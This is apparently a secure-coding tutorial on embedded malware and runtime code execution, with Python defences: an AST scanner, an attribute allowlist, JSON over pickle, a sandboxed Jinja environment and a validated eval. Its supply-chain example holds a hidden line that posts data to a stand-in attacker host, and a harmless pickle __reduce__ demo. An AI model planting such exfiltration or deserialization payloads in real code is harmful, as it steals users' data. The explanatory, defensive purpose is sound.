Embedded malware and dynamic modification refer to situations where malicious behavior runs inside trusted application logic. Hidden code, unsafe runtime execution, or injected behavior allows attackers to steal data, run commands, or alter core functionality without obvious signs.
These issues exploit normal execution paths and trusted components. Security controls lose value when attackers control code flow at runtime, making detection and impact containment difficult.
Real-World Attack Scenarios
Scenario 1: Embedded Malicious Code in Supply Chain
A developer intentionally or unknowingly includes malicious code in a library:
# Library: popular_utility.py
# Appears normal, but includes hidden malicious code

def useful_function():
    # Normal functionality
    return process_data()

def process_data():
    # Normal code
    data = fetch_data()
    # HIDDEN MALICIOUS CODE
    import requests
    requests.post('https://attacker.com/steal',
                  json={'data': data, 'time': __import__('time').time()})
    return data
The attack:
Library published to package manager
Thousands of applications download it
Every application using the library exfiltrates data
Attacker collects data from all applications simultaneously
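The exfiltration pattern above can often be caught before it runs by statically scanning dependency source for network calls that utility code has no business making. A minimal sketch (the flagged call names and the helper `find_suspicious_calls` are illustrative; a real scanner would cover sockets, subprocess, exec, and more):

```python
import ast

def find_suspicious_calls(source):
    """Return (lineno, name) pairs for calls like requests.post(...)."""
    # Illustrative policy: flag outbound HTTP calls by name
    flagged = {('requests', 'post'), ('requests', 'get')}
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            base = node.func.value
            if isinstance(base, ast.Name) and (base.id, node.func.attr) in flagged:
                findings.append((node.lineno, f"{base.id}.{node.func.attr}"))
    return findings

# Scan a shortened version of the malicious library source from the scenario
library_source = '''
def process_data():
    data = fetch_data()
    import requests
    requests.post('https://attacker.com/steal', json={'data': data})
    return data
'''
print(find_suspicious_calls(library_source))  # [(5, 'requests.post')]
```

Name-based matching like this is easy to evade (e.g. via `__import__` aliasing), so it complements, rather than replaces, dependency pinning and hash verification.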
Prevention and Mitigation
Never run eval() on untrusted input; use a restricted expression evaluator instead:
# Bad
result = eval(user_expression)
# Good - Use expression evaluator library
from simpleeval import simple_eval
result = simple_eval(user_expression, names={'x': 5})
ALLOWED_ATTRIBUTES = {'username', 'email', 'preferences'}
for key, value in data.items():
    if key in ALLOWED_ATTRIBUTES:
        setattr(user, key, value)
    else:
        raise ValueError(f"Attribute {key} not allowed")
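Wrapped in a helper and applied to a stand-in user object (the `update_user` helper and `SimpleNamespace` stand-in are illustrative), the allowlist blocks mass-assignment of internal attributes:

```python
from types import SimpleNamespace

ALLOWED_ATTRIBUTES = {'username', 'email', 'preferences'}

def update_user(user, data):
    # Copy only keys on the explicit allowlist
    for key, value in data.items():
        if key in ALLOWED_ATTRIBUTES:
            setattr(user, key, value)
        else:
            raise ValueError(f"Attribute {key} not allowed")

user = SimpleNamespace(username='old', email='old@example.com', preferences={})
update_user(user, {'username': 'alice'})   # allowed key is applied

try:
    update_user(user, {'is_admin': True})  # mass-assignment attempt
except ValueError as exc:
    print(exc)  # Attribute is_admin not allowed
```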
# Bad
obj = pickle.loads(untrusted_data)
# Good - Never deserialize untrusted data
# Use JSON instead
import json
obj = json.loads(untrusted_data)
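The reason JSON is the safer default: a pickle payload can run attacker-chosen code during deserialization itself, before the result is even used. A minimal demonstration (the `Exploit` class is illustrative; a real payload would invoke `os.system` or similar):

```python
import json
import pickle

class Exploit:
    def __reduce__(self):
        # __reduce__ tells pickle what to call on load, so unpickling
        # attacker-controlled bytes runs attacker-chosen code
        return (print, ("code executed during unpickling!",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)  # prints the message as a side effect of loading

# The same bytes are rejected outright by the strict JSON parser
try:
    json.loads(payload)
except ValueError:
    print("json.loads refused the payload")
```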
# Bad - user-controlled template allows server-side template injection
template = Template(user_input)
# Good - Sandboxed template engine (autoescaping alone does not stop
# template injection; the sandbox blocks access to unsafe attributes)
from jinja2 import select_autoescape
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment(
    autoescape=select_autoescape(['html', 'xml']),
)
template = env.from_string(user_input)
# Monitor for suspicious patterns
import ast

def is_safe_expression(expr):
    """Only allow safe math expressions"""
    try:
        tree = ast.parse(expr, mode='eval')
    except SyntaxError:
        return False
    # Only allow specific node types (ast.Expression is the root node
    # produced by mode='eval'; without it every input would be rejected)
    allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
               ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub)
    return all(isinstance(node, allowed) for node in ast.walk(tree))

if is_safe_expression(user_expr):
    # Strip builtins so even a validated expression cannot reach them
    result = eval(user_expr, {'__builtins__': {}}, {})
else:
    raise ValueError("Expression not allowed")